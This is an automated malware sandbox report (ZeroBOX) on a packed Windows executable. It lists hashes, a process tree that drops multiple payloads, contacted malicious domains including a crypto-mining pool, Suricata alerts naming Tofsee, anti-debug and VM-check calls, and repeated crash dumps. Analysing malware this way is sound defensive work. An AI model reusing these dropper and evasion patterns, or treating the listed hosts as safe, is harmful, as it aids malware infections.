Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 30, 2023, 7:42 a.m.	Oct. 30, 2023, 7:44 a.m.

Size	3.6MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`e374462a741bd8b228f22b33bb62f83f`
SHA256	`2dc43cc5e5dba5494a69c25593caa4edec6fbf28bf3ff639c048d7197b253d7c`
CRC32	`8FF2C011`
ssdeep	`49152:HuUrhjMFS/3rBobAcuodhhQEn9/zSLTAjRd3XtJc/1E9nSJTl0pox+vxLOzwsGWY:LaCvUJcFw57`
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature IsPE64 - (no description) OS_Processor_Check_Zero - OS Processor Check

123.exe "C:\Users\test22\AppData\Local\Temp\123.exe"
940
- InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  1372
  - OLPMQcVX11u7l6n7z7sqO64z.exe "C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe"
    2312
    - OLPMQcVX11u7l6n7z7sqO64z.exe "C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe"
      2812
  - bCFxiw2ka2ZDRK02w3xqyvKh.exe "C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe"
    2348
    - bCFxiw2ka2ZDRK02w3xqyvKh.tmp "C:\Users\test22\AppData\Local\Temp\is-IPHDL.tmp\bCFxiw2ka2ZDRK02w3xqyvKh.tmp" /SL5="$60028,2743617,54272,C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe"
      2404
      - EAudioConverter.exe "C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe" -i
        2592
      - schtasks.exe "C:\Windows\system32\schtasks.exe" /Delete /F /TN "EAC1029-3"
        2552
      - EAudioConverter.exe "C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe" -s
        1044
  - KSJwZi29NbbVybij1oTo3y55.exe "C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe"
    2504
    - Broom.exe C:\Users\test22\AppData\Local\Temp\Broom.exe
      2636
  - X99uIwvqb4Dlov1MlVEvrzyW.exe "C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe"
    2692
  - HdSQ0OHeF4h7d8YXhPKY2Icn.exe "C:\Users\test22\Pictures\HdSQ0OHeF4h7d8YXhPKY2Icn.exe" --silent --allusers=0
    2924

Name	Response	Post-Analysis Lookup
insuport.com	A 69.90.162.0	69.90.162.0
yip.su	A 104.21.79.77 A 172.67.169.89	104.21.79.77
pic.himanfast.com	A 104.21.6.189 A 172.67.135.47	104.21.6.189
632432.space	A 171.22.28.204	171.22.28.204
pastebin.com	A 172.67.34.170 A 104.20.67.143 A 104.20.68.143	172.67.34.170
galandskiyher5.com	A 95.214.26.28	95.214.26.28
dl2-broomcleaner.online	A 37.139.129.88	37.139.129.88
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.50.121.153
foryourbar.org	A 172.67.205.237 A 104.21.22.166	104.21.22.166
laubenstein.space	A 74.119.239.234
iplogger.com	A 148.251.234.93	148.251.234.93
pool.hashvault.pro	A 131.153.76.130 A 125.253.92.50	131.153.76.130
lycheepanel.info	A 104.21.32.208 A 172.67.187.122	104.21.32.208
gobs2or.top
net.geo.opera.com	A 107.167.110.211 A 107.167.110.216 CNAME lati.lb.opera.technology CNAME us.net.opera.com	107.167.110.216

IP Address	Status	Action
104.20.68.143	Active	Moloch
104.21.22.166	Active	Moloch
104.21.6.189	Active	Moloch
107.167.110.211	Active	Moloch
121.254.136.9	Active	Moloch
131.153.76.130	Active	Moloch
148.251.234.93	Active	Moloch
164.124.101.2	Active	Moloch
171.22.28.204	Active	Moloch
172.67.169.89	Active	Moloch
172.67.187.122	Active	Moloch
37.139.129.88	Active	Moloch
69.90.162.0	Active	Moloch
74.119.239.234	Active	Moloch
85.217.144.143	Active	Moloch
95.214.26.28	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:64894 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 172.67.169.89:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 104.20.68.143:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 104.21.22.166:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:60225 -> 164.124.101.2:53	2047719	ET INFO External IP Lookup Domain (iplogger .com in DNS lookup)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 172.67.187.122:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49173 -> 171.22.28.204:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 148.251.234.93:443 -> 192.168.56.103:49174	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 148.251.234.93:443	2047718	ET INFO External IP Lookup Domain (iplogger .com in TLS SNI)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49174 -> 148.251.234.93:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 37.139.129.88:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 107.167.110.211:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 69.90.162.0:443 -> 192.168.56.103:49172	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 69.90.162.0:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 85.217.144.143:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 85.217.144.143:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49167	2014819	ET INFO Packed Executable Download	Misc activity
TCP 37.139.129.88:80 -> 192.168.56.103:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 37.139.129.88:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 104.21.6.189:80 -> 192.168.56.103:49168	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 104.21.6.189:80 -> 192.168.56.103:49168	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 104.21.6.189:80 -> 192.168.56.103:49168	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 85.217.144.143:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 95.214.26.28:80 -> 192.168.56.103:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 95.214.26.28:80 -> 192.168.56.103:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
UDP 192.168.56.103:65119 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49165 172.67.169.89:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=yip.su	b6:2b:8b:a8:8c:60:65:fb:9d:d6:9b:25:cf:96:b2:78:7a:29:76:6b
TLS 1.2 192.168.56.103:49164 104.20.68.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f
TLS 1.2 192.168.56.103:49166 104.21.22.166:443	C=US, O=Let's Encrypt, CN=E1	CN=foryourbar.org	2d:18:5b:82:ec:83:90:40:85:58:f0:6f:e9:b6:cd:1b:07:00:58:4a
TLS 1.2 192.168.56.103:49170 172.67.187.122:443	C=US, O=Let's Encrypt, CN=E1	CN=lycheepanel.info	fa:2e:ff:d8:31:ff:34:7b:0d:ed:0c:88:91:99:bd:b3:72:10:92:93
TLS 1.2 192.168.56.103:49173 171.22.28.204:443	C=US, O=Let's Encrypt, CN=R3	CN=632432.space	8b:28:80:18:1c:86:17:be:28:cd:58:ed:e2:b7:54:fd:15:f2:b5:16
TLS 1.2 192.168.56.103:49178 107.167.110.211:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	C=NO, ST=Oslo, L=Oslo, O=Opera Norway AS, CN=net.geo.opera.com	8b:1e:84:38:9c:97:8c:be:f7:e1:0e:28:14:15:bb:08:cc:fb:ad:af
TLS 1.3 192.168.56.103:49554 131.153.76.130:3333	None	None	None

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Oct. 30, 2023, 7:42 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Oct. 30, 2023, 7:42 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 30, 2023, 7:42 a.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 7:42 a.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 7:42 a.m.			0	0
IsDebuggerPresent Oct. 30, 2023, 7:42 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Oct. 30, 2023, 7:42 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1	0
WriteConsoleW Oct. 30, 2023, 7:42 a.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 30, 2023, 7:42 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.managed
section	_RDATA

One or more processes crashed (50 out of 131076 events)

Time & API	Arguments	Status
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: bcfxiw2ka2zdrk02w3xqyvkh+0x3dd1a @ 0x43dd1a bcfxiw2ka2zdrk02w3xqyvkh+0x3d12b @ 0x43d12b bcfxiw2ka2zdrk02w3xqyvkh+0x8f668 @ 0x48f668 bcfxiw2ka2zdrk02w3xqyvkh+0x7b9a6 @ 0x47b9a6 bcfxiw2ka2zdrk02w3xqyvkh+0x933f1 @ 0x4933f1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: f7 37 89 06 e9 dd 07 00 00 8b 06 33 d2 8a 17 8b exception.symbol: bcfxiw2ka2zdrk02w3xqyvkh+0x3b00f exception.instruction: div dword ptr [edi] exception.module: bCFxiw2ka2ZDRK02w3xqyvKh.tmp exception.exception_code: 0xc0000094 exception.offset: 241679 exception.address: 0x43b00f registers.esp: 1637784 registers.edi: 31805620 registers.eax: 1033 registers.ebp: 1637864 registers.edx: 0 registers.ebx: 1 registers.esi: 31805604 registers.ecx: 31805620	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971253248 registers.ebp: 1638096 registers.edx: 7601 registers.ebx: 2130567168 registers.esi: 1971253248 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971249152 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971249152 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971245056 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971245056 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971240960 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971240960 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971236864 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971236864 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971232768 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971232768 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971228672 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971228672 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971224576 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971224576 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971220480 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971220480 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971216384 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971216384 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971212288 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971212288 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971208192 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971208192 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971204096 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971204096 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971200000 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971200000 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1b92bd @ 0x5b92bd eaudioconverter+0x1f11c1 @ 0x5f11c1 eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638056 registers.edi: 5040168 registers.eax: 1971195904 registers.ebp: 1638096 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 1971195904 registers.ecx: 1638264	1
__exception__ Oct. 30, 2023, 7:42 a.m.	stacktrace: eaudioconverter+0x1ba091 @ 0x5ba091 eaudioconverter+0x1ff8a1 @ 0x5ff8a1 eaudioconverter+0x1f92cd @ 0x5f92cd eaudioconverter+0xc3624 @ 0x4c3624 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: ff 30 8b 04 24 56 c7 04 24 e5 df 49 78 89 3c 24 exception.symbol: eaudioconverter+0x1cfb8c exception.instruction: push dword ptr [eax] exception.module: EAudioConverter.exe exception.exception_code: 0xc0000005 exception.offset: 1899404 exception.address: 0x5cfb8c registers.esp: 1638032 registers.edi: 4137 registers.eax: 134217728 registers.ebp: 1638072 registers.edx: 1785442018 registers.ebx: 947526991 registers.esi: 134217728 registers.ecx: 2024	1
